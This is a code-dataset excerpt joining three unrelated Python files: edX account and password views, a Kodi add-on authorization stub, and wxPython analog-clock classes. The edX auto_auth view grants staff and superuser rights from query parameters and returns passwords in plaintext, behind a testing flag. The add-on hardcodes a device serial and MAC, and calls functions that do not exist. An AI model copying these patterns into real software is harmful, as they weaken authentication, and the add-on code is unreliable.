send_activation_email.delay(user, subject, message, from_address)
else:
registration.activate()
_enroll_user_in_pending_courses(user) # Enroll student in any pending courses
# Immediately after a user creates an account, we log them in. They are only
# logged in until they close the browser. They can't log in again until they click
# the activation link from the email.
new_user = authenticate(username=user.username, password=params['password'])
login(request, new_user)
request.session.set_expiry(0)
_record_registration_attribution(request, new_user)
# TODO: there is no error checking here to see that the user actually logged in successfully,
# and is not yet an active user.
if new_user is not None:
AUDIT_LOG.info(u"Login success on new account creation - {0}".format(new_user.username))
if do_external_auth:
eamap.user = new_user
eamap.dtsignup = datetime.datetime.now(UTC)
eamap.save()
AUDIT_LOG.info(u"User registered with external_auth %s", new_user.username)
AUDIT_LOG.info(u'Updated ExternalAuthMap for %s to be %s', new_user.username, eamap)
if settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH'):
log.info('bypassing activation email')
new_user.is_active = True
new_user.save()
AUDIT_LOG.info(u"Login activated on extauth account - {0} ({1})".format(new_user.username, new_user.email))
return new_user
def _enroll_user_in_pending_courses(student):
"""
Enroll student in any pending courses he/she may have.
"""
ceas = CourseEnrollmentAllowed.objects.filter(email=student.email)
for cea in ceas:
if cea.auto_enroll:
enrollment = CourseEnrollment.enroll(student, cea.course_id)
manual_enrollment_audit = ManualEnrollmentAudit.get_manual_enrollment_by_email(student.email)
if manual_enrollment_audit is not None:
# get the enrolled by user and reason from the ManualEnrollmentAudit table.
# then create a new ManualEnrollmentAudit table entry for the same email
# different transition state.
ManualEnrollmentAudit.create_manual_enrollment_audit(
manual_enrollment_audit.enrolled_by, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
manual_enrollment_audit.reason, enrollment
)
def _record_registration_attribution(request, user):
"""
Attribute this user's registration to the referring affiliate, if
applicable.
"""
affiliate_id = request.COOKIES.get(settings.AFFILIATE_COOKIE_NAME)
if user is not None and affiliate_id is not None:
UserAttribute.set_user_attribute(user, REGISTRATION_AFFILIATE_ID, affiliate_id)
@csrf_exempt
def create_account(request, post_override=None):
"""
JSON call to create new edX account.
Used by form in signup_modal.html, which is included into navigation.html
"""
warnings.warn("Please use RegistrationView instead.", DeprecationWarning)
try:
user = create_account_with_params(request, post_override or request.POST)
except AccountValidationError as exc:
return JsonResponse({'success': False, 'value': exc.message, 'field': exc.field}, status=400)
except ValidationError as exc:
field, error_list = next(exc.message_dict.iteritems())
return JsonResponse(
{
"success": False,
"field": field,
"value": error_list[0],
},
status=400
)
redirect_url = None # The AJAX method calling should know the default destination upon success
# Resume the third-party-auth pipeline if necessary.
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
redirect_url = pipeline.get_complete_url(running_pipeline['backend'])
response = JsonResponse({
'success': True,
'redirect_url': redirect_url,
})
set_logged_in_cookies(request, response, user)
return response
def auto_auth(request):
"""
Create or configure a user account, then log in as that user.
Enabled only when
settings.FEATURES['AUTOMATIC_AUTH_FOR_TESTING'] is true.
Accepts the following querystring parameters:
* `username`, `email`, and `password` for the user account
* `full_name` for the user profile (the user's full name; defaults to the username)
* `staff`: Set to "true" to make the user global staff.
* `course_id`: Enroll the student in the course with `course_id`
* `roles`: Comma-separated list of roles to grant the student in the course with `course_id`
* `no_login`: Define this to create the user but not login
* `redirect`: Set to "true" will redirect to the `redirect_to` value if set, or
course home page if course_id is defined, otherwise it will redirect to dashboard
* `redirect_to`: will redirect to to this url
If username, email, or password are not provided, use
randomly generated credentials.
"""
# Generate a unique name to use if none provided
unique_name = uuid.uuid4().hex[0:30]
# Use the params from the request, otherwise use these defaults
username = request.GET.get('username', unique_name)
password = request.GET.get('password', unique_name)
email = request.GET.get('email', unique_name + "@example.com")
full_name = request.GET.get('full_name', username)
is_staff = request.GET.get('staff', None)
is_superuser = request.GET.get('superuser', None)
course_id = request.GET.get('course_id', None)
redirect_to = request.GET.get('redirect_to', None)
# mode has to be one of 'honor'/'professional'/'verified'/'audit'/'no-id-professional'/'credit'
enrollment_mode = request.GET.get('enrollment_mode', 'honor')
course_key = None
if course_id:
course_key = CourseLocator.from_string(course_id)
role_names = [v.strip() for v in request.GET.get('roles', '').split(',') if v.strip()]
redirect_when_done = request.GET.get('redirect', '').lower() == 'true' or redirect_to
login_when_done = 'no_login' not in request.GET
form = AccountCreationForm(
data={
'username': username,
'email': email,
'password': password,
'name': full_name,
},
tos_required=False
)
# Attempt to create the account.
# If successful, this will return a tuple containing
# the new user object.
try:
user, profile, reg = _do_create_account(form)
except (AccountValidationError, ValidationError):
# Attempt to retrieve the existing user.
user = User.objects.get(username=username)
user.email = email
user.set_password(password)
user.save()
profile = UserProfile.objects.get(user=user)
reg = Registration.objects.get(user=user)
# Set the user's global staff bit
if is_staff is not None:
user.is_staff = (is_staff == "true")
user.save()
if is_superuser is not None:
user.is_superuser = (is_superuser == "true")
user.save()
# Activate the user
reg.activate()
reg.save()
# ensure parental consent threshold is met
year = datetime.date.today().year
age_limit = settings.PARENTAL_CONSENT_AGE_LIMIT
profile.year_of_birth = (year - age_limit) - 1
profile.save()
# Enroll the user in a course
if course_key is not None:
CourseEnrollment.enroll(user, course_key, mode=enrollment_mode)
# Apply the roles
for role_name in role_names:
role = Role.objects.get(name=role_name, course_id=course_key)
user.roles.add(role)
# Log in as the user
if login_when_done:
user = authenticate(username=username, password=password)
login(request, user)
create_comments_service_user(user)
# Provide the user with a valid CSRF token
# then return a 200 response unless redirect is true
if redirect_when_done:
# Redirect to specific page if specified
if redirect_to:
redirect_url = redirect_to
# Redirect to course info page if course_id is known
elif course_id:
try:
# redirect to course info page in LMS
redirect_url = reverse(
'info',
kwargs={'course_id': course_id}
)
except NoReverseMatch:
# redirect to course outline page in Studio
redirect_url = reverse(
'course_handler',
kwargs={'course_key_string': course_id}
)
else:
try:
# redirect to dashboard for LMS
redirect_url = reverse('dashboard')
except NoReverseMatch:
# redirect to home for Studio
redirect_url = reverse('home')
return redirect(redirect_url)
elif request.META.get('HTTP_ACCEPT') == 'application/json':
response = JsonResponse({
'created_status': u"Logged in" if login_when_done else "Created",
'username': username,
'email': email,
'password': password,
'user_id': user.id, # pylint: disable=no-member
'anonymous_id': anonymous_id_for_user(user, None),
})
else:
success_msg = u"{} user {} ({}) with password {} and user_id {}".format(
u"Logged in" if login_when_done else "Created",
username, email, password, user.id # pylint: disable=no-member
)
response = HttpResponse(success_msg)
response.set_cookie('csrftoken', csrf(request)['csrf_token'])
return response
@ensure_csrf_cookie
def activate_account(request, key):
"""When link in activation e-mail is clicked"""
regs = Registration.objects.filter(activation_key=key)
if len(regs) == 1:
user_logged_in = request.user.is_authenticated()
already_active = True
if not regs[0].user.is_active:
regs[0].activate()
already_active = False
# Enroll student in any pending courses he/she may have if auto_enroll flag is set
_enroll_user_in_pending_courses(regs[0].user)
resp = render_to_response(
"registration/activation_complete.html",
{
'user_logged_in': user_logged_in,
'already_active': already_active
}
)
return resp
if len(regs) == 0:
return render_to_response(
"registration/activation_invalid.html",
{'csrf': csrf(request)['csrf_token']}
)
return HttpResponseServerError(_("Unknown error. Please e-mail us to let us know how it happened."))
@csrf_exempt
@require_POST
def password_reset(request):
""" Attempts to send a password reset e-mail. """
# Add some rate limiting here by re-using the RateLimitMixin as a helper class
limiter = BadRequestRateLimiter()
if limiter.is_rate_limit_exceeded(request):
AUDIT_LOG.warning("Rate limit exceeded in password_reset")
return HttpResponseForbidden()
form = PasswordResetFormNoActive(request.POST)
if form.is_valid():
form.save(use_https=request.is_secure(),
from_email=configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL),
request=request,
domain_override=request.get_host())
# When password change is complete, a "edx.user.settings.changed" event will be emitted.
# But because changing the password is multi-step, we also emit an event here so that we can
# track where the request was initiated.
tracker.emit(
SETTING_CHANGE_INITIATED,
{
"setting": "password",
"old": None,
"new": None,
"user_id": request.user.id,
}
)
else:
# bad user? tick the rate limiter counter
AUDIT_LOG.info("Bad password_reset user passed in.")
limiter.tick_bad_request_counter(request)
return JsonResponse({
'success': True,
'value': render_to_string('registration/password_reset_done.html', {}),
})
def uidb36_to_uidb64(uidb36):
"""
Needed to support old password reset URLs that use base36-encoded user IDs
https://github.com/django/django/commit/1184d077893ff1bc947e45b00a4d565f3df81776#diff-c571286052438b2e3190f8db8331a92bR231
Args:
uidb36: base36-encoded user ID
Returns: base64-encoded user ID. Otherwise returns a dummy, invalid ID
"""
try:
uidb64 = force_text(urlsafe_base64_encode(force_bytes(base36_to_int(uidb36))))
except ValueError:
uidb64 = '1' # dummy invalid ID (incorrect padding for base64)
return uidb64
def validate_password(user, password):
"""
Tie in password policy enforcement as an optional level of
security protection
Args:
user: the user object whose password we're checking.
password: the user's proposed new password.
Returns:
is_valid_password: a boolean indicating if the new password
passes the validation.
err_msg: an error message if there's a violation of one of the password
checks. Otherwise, `None`.
"""
err_msg = None
if settings.FEATURES.get('ENFORCE_PASSWORD_POLICY', False):
try:
validate_password_strength(password)
except ValidationError as err:
err_msg = _('Password: ') + '; '.join(err.messages)
# also, check the password reuse policy
if not PasswordHistory.is_allowable_password_reuse(user, password):
if user.is_staff:
num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STAFF_PASSWORDS_BEFORE_REUSE']
else:
num_distinct = settings.ADVANCED_SECURITY_CONFIG['MIN_DIFFERENT_STUDENT_PASSWORDS_BEFORE_REUSE']
# Because of how ngettext is, splitting the following into shorter lines would be ugly.
# pylint: disable=line-too-long
err_msg = ungettext(
"You are re-using a password that you have used recently. You must have {num} distinct password before reusing a previous password.",
"You are re-using a password that you have used recently. You must have {num} distinct passwords before reusing a previous password.",
num_distinct
).format(num=num_distinct)
# also, check to see if passwords are getting reset too frequent
if PasswordHistory.is_password_reset_too_soon(user):
num_days = settings.ADVANCED_SECURITY_CONFIG['MIN_TIME_IN_DAYS_BETWEEN_ALLOWED_RESETS']
# Because of how ngettext is, splitting the following into shorter lines would be ugly.
# pylint: disable=line-too-long
err_msg = ungettext(
"You are resetting passwords too frequently. Due to security policies, {num} day must elapse between password resets.",
"You are resetting passwords too frequently. Due to security policies, {num} days must elapse between password resets.",
num_days
).format(num=num_days)
is_password_valid = err_msg is None
return is_password_valid, err_msg
def password_reset_confirm_wrapper(request, uidb36=None, token=None):
"""
A wrapper around django.contrib.auth.views.password_reset_confirm.
Needed because we want to set the user as active at this step.
We also optionally do some additional password policy checks.
"""
# convert old-style base36-encoded user id to base64
uidb64 = uidb36_to_uidb64(uidb36)
platform_name = {
"platform_name": configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
}
try:
uid_int = base36_to_int(uidb36)
user = User.objects.get(id=uid_int)
except (ValueError, User.DoesNotExist):
# if there's any error getting a user, just let django's
# password_reset_confirm function handle it.
return password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
if request.method == 'POST':
password = request.POST['new_password1']
is_password_valid, password_err_msg = validate_password(user, password)
if not is_password_valid:
# We have a password reset attempt which violates some security
# policy. Use the existing Django template to communicate that
# back to the user.
context = {
'validlink': False,
'form': None,
'title': _('Password reset unsuccessful'),
'err_msg': password_err_msg,
}
context.update(platform_name)
return TemplateResponse(
request, 'registration/password_reset_confirm.html', context
)
# remember what the old password hash is before we call down
old_password_hash = user.password
response = password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
# If password reset was unsuccessful a template response is returned (status_code 200).
# Check if form is invalid then show an error to the user.
# Note if password reset was successful we get response redirect (status_code 302).
if response.status_code == 200 and not response.context_data['form'].is_valid():
response.context_data['err_msg'] = _('Error in resetting your password. Please try again.')
return response
# get the updated user
updated_user = User.objects.get(id=uid_int)
# did the password hash change, if so record it in the PasswordHistory
if updated_user.password != old_password_hash:
entry = PasswordHistory()
entry.create(updated_user)
else:
response = password_reset_confirm(
request, uidb64=uidb64, token=token, extra_context=platform_name
)
response_was_successful = response.context_data.get('validlink')
if response_was_successful and not user.is_active:
user.is_active = True
user.save()
return response
def reactivation_email_for_user(user):
try:
reg = Registration.objects.get(user=user)
except Registration.DoesNotExist:
return JsonResponse({
"success": False,
"error": _('No inactive user with this e-mail exists'),
}) # TODO: this should be status code 400 # pylint: disable=fixme
context = {
'name': user.profile.name,
'key': reg.activation_key,
}
subject = render_to_string('emails/activation_email_subject.txt', context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/activation_email.txt', context)
from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
try:
user.email_user(subject, message, from_address)
except Exception: # pylint: disable=broad-except
log.error(
u'Unable to send reactivation email from "%s" to "%s"',
from_address,
user.email,
exc_info=True
)
return JsonResponse({
"success": False,
"error": _('Unable to send reactivation email')
}) # TODO: this should be status code 500 # pylint: disable=fixme
return JsonResponse({"success": True})
def validate_new_email(user, new_email):
"""
Given a new email for a user, does some basic verification of the new address If any issues are encountered
with verification a ValueError will be thrown.
"""
try:
validate_email(new_email)
except ValidationError:
raise ValueError(_('Valid e-mail address required.'))
if new_email == user.email:
raise ValueError(_('Old email is the same as the new email.'))
if User.objects.filter(email=new_email).count() != 0:
raise ValueError(_('An account with this e-mail already exists.'))
def do_email_change_request(user, new_email, activation_key=None):
"""
Given a new email for a user, does some basic verification of the new address and sends an activation message
to the new address. If any issues are encountered with verification or sending the message, a ValueError will
be thrown.
"""
pec_list = PendingEmailChange.objects.filter(user=user)
if len(pec_list) == 0:
pec = PendingEmailChange()
pec.user = user
else:
pec = pec_list[0]
# if activation_key is not passing as an argument, generate a random key
if not activation_key:
activation_key = uuid.uuid4().hex
pec.new_email = new_email
pec.activation_key = activation_key
pec.save()
context = {
'key': pec.activation_key,
'old_email': user.email,
'new_email': pec.new_email
}
subject = render_to_string('emails/email_change_subject.txt', context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/email_change.txt', context)
from_address = configuration_helpers.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
try:
mail.send_mail(subject, message, from_address, [pec.new_email])
except Exception: # pylint: disable=broad-except
log.error(u'Unable to send email activation link to user from "%s"', from_address, exc_info=True)
raise ValueError(_('Unable to send email activation link. Please try again later.'))
# When the email address change is complete, a "edx.user.settings.changed" event will be emitted.
# But because changing the email address is multi-step, we also emit an event here so that we can
# track where the request was initiated.
tracker.emit(
SETTING_CHANGE_INITIATED,
{
"setting": "email",
"old": context['old_email'],
"new": context['new_email'],
"user_id": user.id,
}
)
@ensure_csrf_cookie
def confirm_email_change(request, key): # pylint: disable=unused-argument
"""
User requested a new e-mail. This is called when the activation
link is clicked. We confirm with the old e-mail, and update
"""
with transaction.atomic():
try:
pec = PendingEmailChange.objects.get(activation_key=key)
except PendingEmailChange.DoesNotExist:
response = render_to_response("invalid_email_key.html", {})
transaction.set_rollback(True)
return response
user = pec.user
address_context = {
'old_email': user.email,
'new_email': pec.new_email
}
if len(User.objects.filter(email=pec.new_email)) != 0:
response = render_to_response("email_exists.html", {})
transaction.set_rollback(True)
return response
subject = render_to_string('emails/email_change_subject.txt', address_context)
subject = ''.join(subject.splitlines())
message = render_to_string('emails/confirm_email_change.txt', address_context)
u_prof = UserProfile.objects.get(user=user)
meta = u_prof.get_meta()
if 'old_emails' not in meta:
meta['old_emails'] = []
meta['old_emails'].append([user.email, datetime.datetime.now(UTC).isoformat()])
u_prof.set_meta(meta)
u_prof.save()
# Send it to the old email...
try:
user.email_user(
subject,
message,
configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
)
except Exception: # pylint: disable=broad-except
log.warning('Unable to send confirmation email to old address', exc_info=True)
response = render_to_response("email_change_failed.html", {'email': user.email})
transaction.set_rollback(True)
return response
user.email = pec.new_email
user.save()
pec.delete()
# And send it to the new email...
try:
user.email_user(
subject,
message,
configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
)
except Exception: # pylint: disable=broad-except
log.warning('Unable to send confirmation email to new address', exc_info=True)
response = render_to_response("email_change_failed.html", {'email': pec.new_email})
transaction.set_rollback(True)
return response
response = render_to_response("email_change_successful.html", address_context)
return response
@require_POST
@login_required
@ensure_csrf_cookie
def change_email_settings(request):
"""Modify logged-in user's setting for receiving emails from a course."""
user = request.user
course_id = request.POST.get("course_id")
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
receive_emails = request.POST.get("receive_emails")
if receive_emails:
optout_object = Optout.objects.filter(user=user, course_id=course_key)
if optout_object:
optout_object.delete()
log.info(
u"User %s (%s) opted in to receive emails from course %s",
user.username,
user.email,
course_id,
)
track.views.server_track(
request,
"change-email-settings",
{"receive_emails": "yes", "course": course_id},
page='dashboard',
)
else:
Optout.objects.get_or_create(user=user, course_id=course_key)
log.info(
u"User %s (%s) opted out of receiving emails from course %s",
user.username,
user.email,
course_id,
)
track.views.server_track(
request,
"change-email-settings",
{"receive_emails": "no", "course": course_id},
page='dashboard',
)
return JsonResponse({"success": True})
class LogoutView(TemplateView):
"""
Logs out user and redirects.
The template should load iframes to log the user out of OpenID Connect services.
See http://openid.net/specs/openid-connect-logout-1_0.html.
"""
oauth_client_ids = []
template_name = 'logout.html'
# Keep track of the page to which the user should ultimately be redirected.
target = reverse_lazy('cas-logout') if settings.FEATURES.get('AUTH_USE_CAS') else '/'
def dispatch(self, request, *args, **kwargs): # pylint: disable=missing-docstring
# We do not log here, because we have a handler registered to perform logging on successful logouts.
request.is_from_logout = True
# Get the list of authorized clients before we clear the session.
self.oauth_client_ids = request.session.get(edx_oauth2_provider.constants.AUTHORIZED_CLIENTS_SESSION_KEY, [])
logout(request)
# If we don't need to deal with OIDC logouts, just redirect the user.
if LogoutViewConfiguration.current().enabled and self.oauth_client_ids:
response = super(LogoutView, self).dispatch(request, *args, **kwargs)
else:
response = redirect(self.target)
# Clear the cookie used by the edx.org marketing site
delete_logged_in_cookies(response)
return response
def _build_logout_url(self, url):
"""
Builds a logout URL with the `no_redirect` query string parameter.
Args:
url (str): IDA logout URL
Returns:
str
"""
scheme, netloc, path, query_string, fragment = urlsplit(url)
query_params = parse_qs(query_string)
query_params['no_redirect'] = 1
new_query_string = urlencode(query_params, doseq=True)
return urlunsplit((scheme, netloc, path, new_query_string, fragment))
def get_context_data(self, **kwargs):
context = super(LogoutView, self).get_context_data(**kwargs)
# Create a list of URIs that must be called to log the user out of all of the IDAs.
uris = Client.objects.filter(client_id__in=self.oauth_client_ids,
logout_uri__isnull=False).values_list('logout_uri', flat=True)
referrer = self.request.META.get('HTTP_REFERER', '').strip('/')
logout_uris = []
for uri in uris:
if not referrer or (referrer and not uri.startswith(referrer)):
logout_uris.append(self._build_logout_url(uri))
context.update({
'target': self.target,
'logout_uris': logout_uris,
})
return context
| deepsrijit1105/edx-platform | common/djangoapps/student/views.py | Python | agpl-3.0 | 104,572 |
# -*- coding: utf-8 -*-
# Импортируем нужные нам библиотеки
# import urllib
# import urlparse
# import urllib2
# import time
# import sys
# import os
# try:
# import json
# except ImportError:
# import simplejson as json
import string
import random
from uuid import getnode as get_mac
# import xbmcaddon
import requests
USER = {'ID':0,
'IP':0,
'BALANCE':0,
'ACTIVE':0,
'FREE':0,
'FREEZE':0,
'BLOCK':0,
'TRY':0,
'TRYDATE':0,
'SOHO_BILLING':0,
'SOHO_USER':0,
'GROUPS':''
}
def resolve_device():
global serial, mac
serial = 'JHCNHA5IR42H6'
mac = '84a466a6f089'
# serial = _addon.getSetting("auth.serial")
# mac = _addon.getSetting("auth.mac")
# serial = uuid.uuid5(uuid.NAMESPACE_DNS, mac).hex[-13:]
if not serial:
serial = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(14))
_addon.setSetting("auth.serial", serial)
if not mac:
mac = ''.join(("%012X" % get_mac())[i:i+2] for i in range(0, 12, 2))
_addon.setSetting("auth.mac", mac)
_addon.setSetting("auth.generated", 1)
return serial, mac
def auth():
auth_response = requests.auth_req(serial,mac)
if auth_response['id'] <= 200000:
USER['ID'] = -1
USER['IP'] = auth_response['ip']
USER['BALANCE'] = 0
USER['ACTIVE'] = 0
USER['FREE'] = 0
USER['FREEZE'] = 0
USER['BLOCK'] = 0
USER['TRY'] = 0
USER['TRYDATE'] = 0
USER['SOHO_BILLING'] = 0
USER['SOHO_USER'] = 0
USER['GROUPS'] = ''
else:
USER['ID'] = auth_response['id']
USER['IP'] = auth_response['ip']
USER['BALANCE'] = auth_response['balance']
USER['ACTIVE'] = int(auth_response['active'])
USER['FREE'] = auth_response['free']
USER['FREEZE'] = auth_response['freeze']
USER['BLOCK'] = auth_response['block']
USER['TRY'] = auth_response['try']
USER['TRYDATE'] = auth_response['try_to_date']
USER['SOHO_BILLING'] = auth_response['soho_billing']
USER['SOHO_USER'] = auth_response['soho_user']
USER['GROUPS'] = auth_response['groups']
return USER
# def authorization_loop(period):
# auth(serial, mac)
# # threading.Timer(15, printit).start()
# # auth(serial, mac)
| Limeone/plugin.video.bonus | auth.py | Python | gpl-3.0 | 2,196 |
# AnalogClock's base classes
# E. A. Tacao <e.a.tacao |at| estadao.com.br>
# http://j.domaindlx.com/elements28/wxpython/
# 15 Fev 2006, 22:00 GMT-03:00
# Distributed under the wxWidgets license.
from time import strftime, localtime
import math
import wx
from styles import *
#----------------------------------------------------------------------
_targets = [HOUR, MINUTE, SECOND]
#----------------------------------------------------------------------
class Element:
"""Base class for face, hands and tick marks."""
def __init__(self, idx=0, pos=None, size=None, offset=0, clocksize=None,
scale=1, rotate=False, kind=""):
self.idx = idx
self.pos = pos
self.size = size
self.offset = offset
self.clocksize = clocksize
self.scale = scale
self.rotate = rotate
self.kind = kind
self.text = None
self.angfac = [6, 30][self.kind == "hours"]
def _pol2rect(self, m, t):
return m * math.cos(math.radians(t)), m * math.sin(math.radians(t))
def _rect2pol(self, x, y):
return math.hypot(x, y), math.degrees(math.atan2(y, x))
def DrawRotated(self, dc, offset=0):
pass
def DrawStraight(self, dc, offset=0):
pass
def Draw(self, dc, offset=0):
if self.rotate:
self.DrawRotated(dc, offset)
else:
self.DrawStraight(dc, offset)
def RecalcCoords(self, clocksize, centre, scale):
pass
def GetSize(self):
return self.size
def GetOffset(self):
return self.offset
def GetIsRotated(self, rotate):
return self.rotate
def GetMaxSize(self, scale=1):
return self.size * scale
def GetScale(self):
return self.scale
def SetIsRotated(self, rotate):
self.rotate = rotate
def GetMaxSize(self, scale=1):
return self.size * scale
def GetPolygon(self):
return self.polygon
def SetPosition(self, pos):
self.pos = pos
def SetSize(self, size):
self.size = size
def SetOffset(self, offset):
self.offset = offset
def SetClockSize(self, clocksize):
self.clocksize = clocksize
def SetScale(self, scale):
self.scale = scale
def SetIsRotated(self, rotate):
self.rotate = rotate
def SetPolygon(self, polygon):
self.polygon = polygon
#----------------------------------------------------------------------
class ElementWithDyer(Element):
"""Base class for clock face and hands."""
def __init__(self, **kwargs):
self.dyer = kwargs.pop("dyer", Dyer())
Element.__init__(self, **kwargs)
def GetFillColour(self):
return self.dyer.GetFillColour()
def GetBorderColour(self):
return self.dyer.GetBorderColour()
def GetBorderWidth(self):
return self.dyer.GetBorderWidth()
def GetShadowColour(self):
return self.dyer.GetShadowColour()
def SetFillColour(self, colour):
self.dyer.SetFillColour(colour)
def SetBorderColour(self, colour):
self.dyer.SetBorderColour(colour)
def SetBorderWidth(self, width):
self.dyer.SetBorderWidth(width)
def SetShadowColour(self, colour):
self.dyer.SetShadowColour(colour)
#----------------------------------------------------------------------
class Face(ElementWithDyer):
"""Holds info about the clock face."""
def __init__(self, **kwargs):
ElementWithDyer.__init__(self, **kwargs)
def Draw(self, dc):
self.dyer.Select(dc)
dc.DrawCircle(self.pos.x, self.pos.y, self.radius)
def RecalcCoords(self, clocksize, centre, scale):
self.radius = min(clocksize.Get()) / 2. - self.dyer.width / 2.
self.pos = centre
#----------------------------------------------------------------------
class Hand(ElementWithDyer):
"""Holds info about a clock hand."""
def __init__(self, **kwargs):
self.lenfac = kwargs.pop("lenfac")
ElementWithDyer.__init__(self, **kwargs)
self.SetPolygon([[-1, 0], [0, -1], [1, 0], [0, 4]])
def Draw(self, dc, end, offset=0):
radius, centre, r = end
angle = math.degrees(r)
polygon = self.polygon[:]
vscale = radius / max([y for x, y in polygon])
for i, (x, y) in enumerate(polygon):
x *= self.scale * self.size
y *= vscale * self.lenfac
m, t = self._rect2pol(x, y)
polygon[i] = self._pol2rect(m, t - angle)
dc.DrawPolygon(polygon, centre.x + offset, centre.y + offset)
def RecalcCoords(self, clocksize, centre, scale):
self.pos = centre
self.scale = scale
#----------------------------------------------------------------------
class TickSquare(Element):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
Element.__init__(self, **kwargs)
def Draw(self, dc, offset=0):
width = height = self.size * self.scale
x = self.pos.x - width / 2.
y = self.pos.y - height / 2.
dc.DrawRectangle(x + offset, y + offset, width, height)
#----------------------------------------------------------------------
class TickCircle(Element):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
Element.__init__(self, **kwargs)
def Draw(self, dc, offset=0):
radius = self.size * self.scale / 2.
x = self.pos.x
y = self.pos.y
dc.DrawCircle(x + offset, y + offset, radius)
#----------------------------------------------------------------------
class TickPoly(Element):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
Element.__init__(self, **kwargs)
self.SetPolygon([[0, 1], [1, 0], [2, 1], [1, 5]])
def _calcPolygon(self):
width = max([x for x, y in self.polygon])
height = max([y for x, y in self.polygon])
tscale = self.size / max(width, height) * self.scale
polygon = [(x * tscale, y * tscale) for x, y in self.polygon]
width = max([x for x, y in polygon])
height = max([y for x, y in polygon])
return polygon, width, height
def DrawStraight(self, dc, offset=0):
polygon, width, height = self._calcPolygon()
x = self.pos.x - width / 2.
y = self.pos.y - height / 2.
dc.DrawPolygon(polygon, x + offset, y + offset)
def DrawRotated(self, dc, offset=0):
polygon, width, height = self._calcPolygon()
angle = 360 - self.angfac * (self.idx + 1)
r = math.radians(angle)
for i in range(len(polygon)):
m, t = self._rect2pol(*polygon[i])
t -= angle
polygon[i] = self._pol2rect(m, t)
x = self.pos.x - math.cos(r) * width / 2. - math.sin(r) * height / 2.
y = self.pos.y - math.cos(r) * height / 2. + math.sin(r) * width / 2.
dc.DrawPolygon(polygon, x + offset, y + offset)
#----------------------------------------------------------------------
class TickDecimal(Element):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
Element.__init__(self, **kwargs)
self.text = "%s" % (self.idx + 1)
def DrawStraight(self, dc, offset=0):
width, height = dc.GetTextExtent(self.text)
x = self.pos.x - width / 2.
y = self.pos.y - height / 2.
dc.DrawText(self.text, x + offset, y + offset)
def DrawRotated(self, dc, offset=0):
width, height = dc.GetTextExtent(self.text)
angle = 360 - self.angfac * (self.idx + 1)
r = math.radians(angle)
x = self.pos.x - math.cos(r) * width / 2. - math.sin(r) * height / 2.
y = self.pos.y - math.cos(r) * height / 2. + math.sin(r) * width / 2.
dc.DrawRotatedText(self.text, x + offset, y + offset, angle)
#----------------------------------------------------------------------
class TickRoman(TickDecimal):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
TickDecimal.__init__(self, **kwargs)
self.text = ["I","II","III","IV","V", \
"VI","VII","VIII","IX","X", \
"XI","XII","XIII","XIV","XV", \
"XVI","XVII","XVIII","XIX","XX", \
"XXI","XXII","XXIII","XXIV","XXV", \
"XXVI","XXVII","XXVIII","XXIX","XXX", \
"XXXI","XXXII","XXXIII","XXXIV","XXXV", \
"XXXVI","XXXVII","XXXVIII","XXXIX","XL", \
"XLI","XLII","XLIII","XLIV","XLV", \
"XLVI","XLVII","XLVIII","XLIX","L", \
"LI","LII","LIII","LIV","LV", \
"LVI","LVII","LVIII","LIX","LX"][self.idx]
#----------------------------------------------------------------------
class TickBinary(TickDecimal):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
TickDecimal.__init__(self, **kwargs)
def d2b(n, b=""):
while n > 0:
b = str(n % 2) + b; n = n >> 1
return b.zfill(4)
self.text = d2b(self.idx + 1)
#----------------------------------------------------------------------
class TickHex(TickDecimal):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
TickDecimal.__init__(self, **kwargs)
self.text = hex(self.idx + 1)[2:].upper()
#----------------------------------------------------------------------
class TickNone(Element):
"""Holds info about a tick mark."""
def __init__(self, **kwargs):
Element.__init__(self, **kwargs)
def Draw(self, dc, offset=0):
pass
#----------------------------------------------------------------------
class Dyer:
"""Stores info about colours and borders of clock Elements."""
def __init__(self, border=None, width=0, fill=None, shadow=None):
"""
self.border (wx.Colour) border colour
self.width (int) border width
self.fill (wx.Colour) fill colour
self.shadow (wx.Colour) shadow colour
"""
self.border = border or \
wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT)
self.fill = fill or \
wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT)
self.shadow = shadow or \
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW)
self.width = width
def Select(self, dc, shadow=False):
"""Selects the current settings into the dc."""
if not shadow:
dc.SetPen(wx.Pen(self.border, self.width, wx.SOLID))
dc.SetBrush(wx.Brush(self.fill, wx.SOLID))
dc.SetTextForeground(self.fill)
else:
dc.SetPen(wx.Pen(self.shadow, self.width, wx.SOLID))
dc.SetBrush(wx.Brush(self.shadow, wx.SOLID))
dc.SetTextForeground(self.shadow)
def GetFillColour(self):
return self.fill
def GetBorderColour(self):
return self.border
def GetBorderWidth(self):
return self.width
def GetShadowColour(self):
return self.shadow
def SetFillColour(self, colour):
self.fill = colour
def SetBorderColour(self, colour):
self.border = colour
def SetBorderWidth(self, width):
self.width = width
def SetShadowColour(self, colour):
self.shadow = colour
#----------------------------------------------------------------------
class HandSet:
"""Manages the set of hands."""
def __init__(self, parent, h, m, s):
self.parent = parent
self.hands = [h, m, s]
self.radius = 1
self.centre = wx.Point(1, 1)
